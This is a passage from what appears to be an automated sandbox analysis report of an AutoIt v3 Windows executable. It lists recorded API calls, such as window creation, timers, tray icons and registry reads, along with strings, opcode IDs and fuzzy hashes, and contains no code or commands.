                                                    • Opcode Fuzzy Hash: b1f32ef6f01fd1adcf41123fe48aa96101f243b66a792e24c5cf21869e5e2082
                                                    • Instruction Fuzzy Hash: B1D10630104242EBC715EF61D8419EBBBA4FF14354F104A2FF095576A1CB74E9DACB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 003C36D2
                                                    • KillTimer.USER32(?,00000001), ref: 003C36FC
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003C371F
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003C372A
                                                    • CreatePopupMenu.USER32 ref: 003C373E
                                                    • PostQuitMessage.USER32(00000000), ref: 003C375F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                    • String ID: TaskbarCreated$%E
                                                    • API String ID: 129472671-1317701673
                                                    • Opcode ID: 0abc1e7b138e0d380e698cbbd4f95414cbffa6c4202286352907defdfac6205c
                                                    • Instruction ID: 87b7e799883f706fed0d1337bbdeb6797ba5b4860dea3295ba3fe161ae465041
                                                    • Opcode Fuzzy Hash: 0abc1e7b138e0d380e698cbbd4f95414cbffa6c4202286352907defdfac6205c
                                                    • Instruction Fuzzy Hash: 5F416BB2200105BBDB177F64EC49F7D3759EB01300F16893EFA06C62A1CB699E5497A9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 003C3074
                                                    • RegisterClassExW.USER32 ref: 003C309E
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003C3B46), ref: 003C30AF
                                                    • InitCommonControlsEx.COMCTL32(0044F96C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003C3B46), ref: 003C30CC
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003C30DC
                                                    • LoadIconW.USER32(000000A9), ref: 003C30F2
                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003C3101
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-2659433951
                                                    • Opcode ID: 6ddee08f80c7e01c8e67be3b25ff7d9d57762f3968d55de0c2a659825e1cc079
                                                    • Instruction ID: fe91f6e0f70159e0d2ad23a9a1262e636d07b6f8fe4613b581c98ae1488990d0
                                                    • Opcode Fuzzy Hash: 6ddee08f80c7e01c8e67be3b25ff7d9d57762f3968d55de0c2a659825e1cc079
                                                    • Instruction Fuzzy Hash: BD3147B5841309EFDB41EFA4EC89ADEBBF4FB09310F10446EE190A62A0D3B90545CF59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 003C3074
                                                    • RegisterClassExW.USER32 ref: 003C309E
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003C3B46), ref: 003C30AF
                                                    • InitCommonControlsEx.COMCTL32(0044F96C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003C3B46), ref: 003C30CC
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003C30DC
                                                    • LoadIconW.USER32(000000A9), ref: 003C30F2
                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003C3101
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-2659433951
                                                    • Opcode ID: 022c02ac51735abb6b4c2a8841a19e3ee4e95a7bd632c9f2b602d3f455d5b62f
                                                    • Instruction ID: a5e5b537c95c71ac7f1fe210968b7271b25bfc6e2857e0aeeb9833c862f5625d
                                                    • Opcode Fuzzy Hash: 022c02ac51735abb6b4c2a8841a19e3ee4e95a7bd632c9f2b602d3f455d5b62f
                                                    • Instruction Fuzzy Hash: F921E5B5941208AFDB40EFA4EC48BDEBBF4FB09710F01452AF514A62A0D7B60548CFA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • mciSendStringW.WINMM(close all,?,?,?), ref: 003CFC06
                                                    • OleUninitialize.OLE32(?,00000000), ref: 003CFCA5
                                                    • UnregisterHotKey.USER32(?), ref: 003CFDFC
                                                    • DestroyWindow.USER32(?), ref: 00404A00
                                                    • FreeLibrary.KERNEL32(?), ref: 00404A65
                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00404A92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                    • String ID: close all
                                                    • API String ID: 469580280-3243417748
                                                    • Opcode ID: ed0443544d38bdbcb8f844bf124fe09b391b197e905a97804f8ee8aa9c884b6c
                                                    • Instruction ID: 52263a45816c803b69d906394287271ef3d9e4b38a53d43e2aeef5bf65f88078
                                                    • Opcode Fuzzy Hash: ed0443544d38bdbcb8f844bf124fe09b391b197e905a97804f8ee8aa9c884b6c
                                                    • Instruction Fuzzy Hash: 03B1AE757011129FCB2AEB14D895F6AF365FF41300F1542BEE50AAB2A2CB34AD16CF58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003C4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004862F8,?,003C37C0,?,00000000,00000001), ref: 003C4882
                                                      • Part of subcall function 003E074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,003C72C5), ref: 003E0771
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003C7308
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003FECF1
                                                    • RegQueryValueExW.ADVAPI32(?,Include,?,?,?,?,00000000), ref: 003FED32
                                                    • RegCloseKey.ADVAPI32(?), ref: 003FED70
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath
                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                    • API String ID: 338900592-2727554177
                                                    • Opcode ID: fb592fcb66233f10f9057283079d3404843da7e26e1cd4a2cdac0a10090d5a53
                                                    • Instruction ID: 77edc1ade32301b2d74c95979db7bbe3281c6519cd409eda8929be51224099f1
                                                    • Opcode Fuzzy Hash: fb592fcb66233f10f9057283079d3404843da7e26e1cd4a2cdac0a10090d5a53
                                                    • Instruction Fuzzy Hash: 8D7168714083059EC316EF25EC91AAFBBA8EB94350B50497EF545CB1A1EB30D948CB6A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 003C3A62
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 003C3A71
                                                    • LoadIconW.USER32(00000063), ref: 003C3A88
                                                    • LoadIconW.USER32(000000A4), ref: 003C3A9A
                                                    • LoadIconW.USER32(000000A2), ref: 003C3AAC
                                                    • LoadImageW.USER32 ref: 003C3AD2
                                                    • RegisterClassExW.USER32 ref: 003C3B28
                                                      • Part of subcall function 003C3041: GetSysColorBrush.USER32(0000000F), ref: 003C3074
                                                      • Part of subcall function 003C3041: RegisterClassExW.USER32 ref: 003C309E
                                                      • Part of subcall function 003C3041: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003C3B46), ref: 003C30AF
                                                      • Part of subcall function 003C3041: InitCommonControlsEx.COMCTL32(0044F96C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003C3B46), ref: 003C30CC
                                                      • Part of subcall function 003C3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003C30DC
                                                      • Part of subcall function 003C3041: LoadIconW.USER32(000000A9), ref: 003C30F2
                                                      • Part of subcall function 003C3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003C3101
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                    • String ID: AutoIt v3
                                                    • API String ID: 423443420-1704141276
                                                    • Opcode ID: 7e44419db9adc364d9806d8535bbe2e1e9b951ff67b06c86e2a6487629f8335f
                                                    • Instruction ID: 2bdcee30c30ce763d9f8377d0fa59be8278a5f95a3f8e21b9c38a3fbcf6b60e9
                                                    • Opcode Fuzzy Hash: 7e44419db9adc364d9806d8535bbe2e1e9b951ff67b06c86e2a6487629f8335f
                                                    • Instruction Fuzzy Hash: 1B216B75900308AFEB51AFA4EC49F9D7FB4FB08710F1145BEF504AA2A0C3BA16548F58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003E03A2: MapVirtualKeyW.USER32(0000005B), ref: 003E03D3
                                                      • Part of subcall function 003E03A2: MapVirtualKeyW.USER32(00000010), ref: 003E03DB
                                                      • Part of subcall function 003E03A2: MapVirtualKeyW.USER32(000000A0), ref: 003E03E6
                                                      • Part of subcall function 003E03A2: MapVirtualKeyW.USER32(000000A1), ref: 003E03F1
                                                      • Part of subcall function 003E03A2: MapVirtualKeyW.USER32(00000011), ref: 003E03F9
                                                      • Part of subcall function 003E03A2: MapVirtualKeyW.USER32(00000012), ref: 003E0401
                                                      • Part of subcall function 003D6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00443DD0,00000001,?,0044F910), ref: 003D62B4
                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003CFB2D
                                                    • OleInitialize.OLE32(00000000), ref: 003CFBAA
                                                    • CloseHandle.KERNEL32(00000000), ref: 004049F2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                    • String ID: <gH$\dH$%E$cH
                                                    • API String ID: 1986988660-2388256643
                                                    • Opcode ID: ce2c76a6bdea7f1f017b870d5a9ccac59f915cd15b2119c374cf0bab580be74b
                                                    • Instruction ID: 39586cc64b4656cd08f5600d6a4e651fb4fb8b82472dfceebd8baf8bd295373e
                                                    • Opcode Fuzzy Hash: ce2c76a6bdea7f1f017b870d5a9ccac59f915cd15b2119c374cf0bab580be74b
                                                    • Instruction Fuzzy Hash: AE819AB09012509EC3C5EF79ED54A1D7BE5FB58B08B12893EE818CB262EB395408CF5D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003E9E4B: EnterCriticalSection.KERNEL32(?,?,003E9CBC,0000000D), ref: 003E9E76
                                                    • RtlDecodePointer.NTDLL(0047BB70,0000001C,003E33C2,00000000,00000001,00000000,?,003E3310,000000FF,?,003E9E6E,00000011,?,?,003E9CBC,0000000D), ref: 003E34B6
                                                    • DecodePointer.KERNEL32(?,003E3310,000000FF,?,003E9E6E,00000011,?,?,003E9CBC,0000000D), ref: 003E34C7
                                                    • EncodePointer.KERNEL32(00000000,?,003E3310,000000FF,?,003E9E6E,00000011,?,?,003E9CBC,0000000D), ref: 003E34E0
                                                    • DecodePointer.KERNEL32(-00000004,?,003E3310,000000FF,?,003E9E6E,00000011,?,?,003E9CBC,0000000D), ref: 003E34F0
                                                    • EncodePointer.KERNEL32(00000000,?,003E3310,000000FF,?,003E9E6E,00000011,?,?,003E9CBC,0000000D), ref: 003E34F6
                                                    • DecodePointer.KERNEL32(?,003E3310,000000FF,?,003E9E6E,00000011,?,?,003E9CBC,0000000D), ref: 003E350C
                                                    • DecodePointer.KERNEL32(?,003E3310,000000FF,?,003E9E6E,00000011,?,?,003E9CBC,0000000D), ref: 003E3517
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Pointer$Decode$Encode$CriticalEnterSection
                                                    • String ID:
                                                    • API String ID: 3368343417-0
                                                    • Opcode ID: 876c693ef5ee5a519ec3c8234a55604b02e15f09d7b7eee2ccad0847980a3c81
                                                    • Instruction ID: 810d4a27ad54f49483138d5a506d06fccb30e37d043af80b90fcad8666217537
                                                    • Opcode Fuzzy Hash: 876c693ef5ee5a519ec3c8234a55604b02e15f09d7b7eee2ccad0847980a3c81
                                                    • Instruction Fuzzy Hash: 3F318D709043A99EEF12AF66EC0D79D7BB0FB45311F21467AE404AA2D0DBB51A44CF18
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateWindowExW.USER32 ref: 003C3A15
                                                    • CreateWindowExW.USER32 ref: 003C3A36
                                                    • ShowWindow.USER32(00000001,?,?,?,003C49C2,?), ref: 003C3A4A
                                                    • ShowWindow.USER32(00000001,?,?,?,003C49C2,?), ref: 003C3A53
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Window$CreateShow
                                                    • String ID: AutoIt v3$edit
                                                    • API String ID: 1584632944-3779509399
                                                    • Opcode ID: df95a080021a3c39a1fcadb3d89dfac9f5f20fde3532288946dde1840e79a72f
                                                    • Instruction ID: 24f8fe77482e8b3688a4295e0746637efa6c729492ad72a351d464be80a4f454
                                                    • Opcode Fuzzy Hash: df95a080021a3c39a1fcadb3d89dfac9f5f20fde3532288946dde1840e79a72f
                                                    • Instruction Fuzzy Hash: 74F03A716402907EEA702727AC08F3B3E3DD7C7F51B0245BEB900A6170C6A90844CBB8

APIs
• GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109,?,00000000,0047BC78,0000000C,003E549B,?,?,00000040), ref: 003F8355
• GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109,?,00000000,0047BC78,0000000C,003E549B,?,?,00000040), ref: 003F836F
• GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109,?,00000000,0047BC78,0000000C,003E549B,?,?,00000040), ref: 003F8392
• CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000109,?,00000000,0047BC78,0000000C,003E549B,?,?,00000040), ref: 003F83A4
• CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000109,?,00000000,0047BC78,0000000C,003E549B,?,?,00000040), ref: 003F876A
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109,?,00000000), ref: 003F8796
  • Part of subcall function 003F0D2D: FindCloseChangeNotification.KERNELBASE(00000000,?,00000109,?,003F8469,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 003F0D7D
  • Part of subcall function 003F0D2D: GetLastError.KERNEL32(?,003F8469,?,?,?,?,?,?,?,?,?,00000000,00000109,?,00000000,0047BC78), ref: 003F0D87
Memory Dump Source
• Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
• Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$Close$Handle$ChangeFileFindNotificationType
• String ID:
• API String ID: 688622981-0
• Opcode ID: 027f2f791d836870666ce052b0980fc48960d7d1a272b883af55e201262129c2
• Instruction ID: ce7b65ff6851161180d4cd0b418e1a86c78f2762258e408cf5169e79fae30801
• Opcode Fuzzy Hash: 027f2f791d836870666ce052b0980fc48960d7d1a272b883af55e201262129c2
• Instruction Fuzzy Hash: EE222472D0410EAFEB2B9F68DC42BBE7B64EB01324F254629E711AA2E1DF358D51C750

Memory Dump Source
• Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
• Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID: BE
• API String ID: 0-66389866
• Opcode ID: 60846b20b48fadabed6b0e5f90e4a2535ab5ba3a829d8a1aa2457197ad50c7c8
• Instruction ID: c6b582d3e95b41e7bb527732a02becef7dd112ac95639b00793053b0db0d3939
• Opcode Fuzzy Hash: 60846b20b48fadabed6b0e5f90e4a2535ab5ba3a829d8a1aa2457197ad50c7c8
• Instruction Fuzzy Hash: 70627FF19002B98EDB278F16CC857AAF7B8EB44314F1542EAD648A72D1E7305EC58F58

APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,CreateFile2,00000001,?,?,?,00000000,00000109,?,00000000,0047BC78,0000000C,003E549B,?,?,00000040), ref: 003F7F66
• GetProcAddress.KERNEL32(00000000), ref: 003F7F6D
• CreateFileW.KERNELBASE(?,?,?,00000080,?,?,00000000,00000001,?,?,?,00000000,00000109,?,00000000,0047BC78), ref: 003F7FCB
Memory Dump Source
• Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
• Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
Similarity
• API ID: AddressCreateFileHandleModuleProc
• String ID: CreateFile2$kernel32.dll
• API String ID: 2580138172-1988006178
• Opcode ID: f36d102d5a819f0589a3ff55a512c8e15338f83f3c0772fecf716293570b759f
• Instruction ID: ccd82226683910e67a2909232f860e8c5df4d42acc74ae4f53959292bb20fd41
• Opcode Fuzzy Hash: f36d102d5a819f0589a3ff55a512c8e15338f83f3c0772fecf716293570b759f
• Instruction Fuzzy Hash: A011097290020EEFDF029FA4DC05AFE7BB9FF08351F104115FA14961A0C7369A249BA1

APIs
• RtlDecodePointer.NTDLL(00000004,00000001,00000000,?,?,003E2EA5,?,0047BB50,0000000C,003E2F8B,?,?,003C8AED,003FB80A,0044FB84,?), ref: 003E2EDB
• DecodePointer.KERNEL32(?,?,003E2EA5,?,0047BB50,0000000C,003E2F8B,?,?,003C8AED,003FB80A,0044FB84,?,00000000,00000001,?), ref: 003E2EE6
• EncodePointer.KERNEL32(00000000,?,?,003E2EA5,?,0047BB50,0000000C,003E2F8B,?,?,003C8AED,003FB80A,0044FB84,?,00000000,00000001), ref: 003E2F4D
• EncodePointer.KERNEL32(?,?,?,003E2EA5,?,0047BB50,0000000C,003E2F8B,?,?,003C8AED,003FB80A,0044FB84,?,00000000,00000001), ref: 003E2F5B
• EncodePointer.KERNEL32(00000004,?,?,003E2EA5,?,0047BB50,0000000C,003E2F8B,?,?,003C8AED,003FB80A,0044FB84,?,00000000,00000001), ref: 003E2F67
Memory Dump Source
• Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
• Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
Similarity
• API ID: Pointer$Encode$Decode
• String ID:
• API String ID: 1898114064-0
• Opcode ID: d7a515d59dfa60af1f1e42d677997054f53a35834c983bc40a37dec96c6e3447
• Instruction ID: 3d99a22b8d26405bcd0c8f80c22833638bb01c58e46e928618ba61fb1c917d2d
• Opcode Fuzzy Hash: d7a515d59dfa60af1f1e42d677997054f53a35834c983bc40a37dec96c6e3447
• Instruction Fuzzy Hash: 8811D672A24264AFDB11EF75ED84CABBBBDFB01390710467AF805D2590EB31EC018B64

APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,00000000,80000001,80000001,?,003C35A1,SwapMouseButtons,00000004,?,MAIN,MAIN), ref: 003C35D4
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00000000,80000001,80000001,?,003C35A1,SwapMouseButtons,00000004,?), ref: 003C35F5
• RegCloseKey.KERNELBASE(00000000,?,00000000,80000001,80000001,?,003C35A1,SwapMouseButtons,00000004,?,MAIN,MAIN,?,00424EB8,?,0043502E), ref: 003C3617
Memory Dump Source
• Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
• Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
• Opcode ID: d2430cbec2965e75f398163093708ff249c8f48badeb4a9db651f4bc30618dac
• Instruction ID: 677ee52983e14bb96c9a099ac7e5aaf98d94304c6d95c4fef85b765339f0a1dc
• Opcode Fuzzy Hash: d2430cbec2965e75f398163093708ff249c8f48badeb4a9db651f4bc30618dac
• Instruction Fuzzy Hash: 5D114875610108BEDB218FA4EC84EFEBBBCEF41344F028569F405D7210D232AF549760

APIs
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003C41F1
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003FD5EC
Memory Dump Source
• Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
• Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
Similarity
• API ID: IconLoadNotifyShell_String
• String ID: Line:
• API String ID: 3363329723-1585850449
• Opcode ID: 7aed34e559dd275ddf3968765b8d6fe823f09ea3694fab7120a610cf0aae47f6
• Instruction ID: 1e3c47b31aa8f6d93fb4f8e39a88dff22b9346a04fedeba98b7ec43db8fb8eee
• Opcode Fuzzy Hash: 7aed34e559dd275ddf3968765b8d6fe823f09ea3694fab7120a610cf0aae47f6
• Instruction Fuzzy Hash: 9931A1710083546AD363FB60DC46FDF77ECAB44310F10496EF589DA0A1EB74AA48CB96

Memory Dump Source
• Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
• Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9ae39d2386e0de0a1e5698799651f81b3ddb6c15722ff586e814a655359955aa
• Instruction ID: e2fcb2df9a7d436a1fe45cc1dae348020afeeda648fdcf2f3641915cd6f51b19
• Opcode Fuzzy Hash: 9ae39d2386e0de0a1e5698799651f81b3ddb6c15722ff586e814a655359955aa
• Instruction Fuzzy Hash: BAF19A719083009FC714DF29D884A6BBBE4FF88328F14892EF8999B251D735E945CF96

APIs
  • Part of subcall function 003C410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003C41F1
• KillTimer.USER32(?,00000001,?,?), ref: 003C45B5
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003C45C4
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003FD6CE
Memory Dump Source
• Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
